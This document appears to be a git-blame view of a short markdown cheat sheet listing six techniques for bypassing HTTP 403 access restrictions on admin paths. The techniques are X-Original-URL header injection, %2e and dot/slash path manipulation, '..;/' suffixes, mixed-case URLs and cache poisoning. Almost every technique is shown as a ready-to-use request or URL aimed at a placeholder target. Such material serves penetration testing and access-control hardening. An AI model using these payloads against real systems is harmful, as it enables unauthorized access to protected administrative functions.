2020-09-09 14:53:05 +00:00
|
|
|
|
# 403 Forbidden Bypass
|
|
|
|
|
|
|
|
|
|
1. Using "X-Original-URL" header
|
|
|
|
|
```
|
|
|
|
|
GET /admin HTTP/1.1
|
|
|
|
|
Host: target.com
|
|
|
|
|
```
|
|
|
|
|
Try this to bypass
|
|
|
|
|
```
|
|
|
|
|
GET /anything HTTP/1.1
|
|
|
|
|
Host: target.com
|
|
|
|
|
X-Original-URL: /admin
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
2. Appending **%2e** after the first slash
|
|
|
|
|
```
|
|
|
|
|
http://target.com/admin => 403
|
|
|
|
|
```
|
|
|
|
|
Try this to bypass
|
|
|
|
|
```
|
|
|
|
|
http://target.com/%2e/admin => 200
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
3. Try add dot (.) and slash (/) in the URL
|
|
|
|
|
```
|
|
|
|
|
http://target.com/admin => 403
|
|
|
|
|
```
|
|
|
|
|
Try this to bypass
|
|
|
|
|
```
|
|
|
|
|
http://target.com/admin/. => 200
|
|
|
|
|
http://target.com//admin// => 200
|
|
|
|
|
http://target.com/./admin/./ => 200
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
4. Add "..;/" after the directory name
|
|
|
|
|
```
|
|
|
|
|
http://target.com/admin
|
|
|
|
|
```
|
|
|
|
|
Try this to bypass
|
|
|
|
|
```
|
|
|
|
|
http://target.com/admin..;/
|
|
|
|
|
```
|
2020-09-09 14:56:10 +00:00
|
|
|
|
|
2020-09-17 15:55:57 +00:00
|
|
|
|
|
|
|
|
|
5. Try to uppercase the alphabet in the url
|
|
|
|
|
```
|
|
|
|
|
http://target.com/admin
|
|
|
|
|
```
|
|
|
|
|
Try this to bypass
|
|
|
|
|
```
|
|
|
|
|
http://target.com/aDmIN
|
|
|
|
|
```
|
|
|
|
|
|
2021-02-08 11:35:49 +00:00
|
|
|
|
6. Via Web Cache Poisoning
|
|
|
|
|
```
|
|
|
|
|
GET /anything HTTP/1.1
|
|
|
|
|
Host: victim.com
|
|
|
|
|
X-Original-URL: /admin
|
|
|
|
|
```
|
|
|
|
|
|
2020-09-17 15:55:57 +00:00
|
|
|
|
Source: [@iam_j0ker](https://twitter.com/iam_j0ker)
|